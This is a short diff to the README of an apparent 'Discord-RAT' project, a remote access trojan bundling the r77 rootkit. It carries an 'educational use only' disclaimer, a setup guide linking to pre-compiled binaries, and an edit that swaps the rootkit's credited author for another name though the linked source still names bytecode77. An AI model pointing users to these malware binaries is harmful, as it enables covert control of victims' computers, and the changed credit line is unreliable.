CYDIA-Unc0ver/Discord-RAT-/README.md

 This tool is for educational use only, the author will not be held responsible for any misuse of this tool.

 ## **Credits**
-The rootkit in the project was made by "bytecode77".
+The rootkit in the project was made by "Johan".
 The source of the rootkit can be found here: https://github.com/bytecode77/r77-rootkit

 ## **Setup Guide:**
 Download the pre-complied binary's here https://github.com/moom825/Discord-RAT-2.0/releases/tag/2.0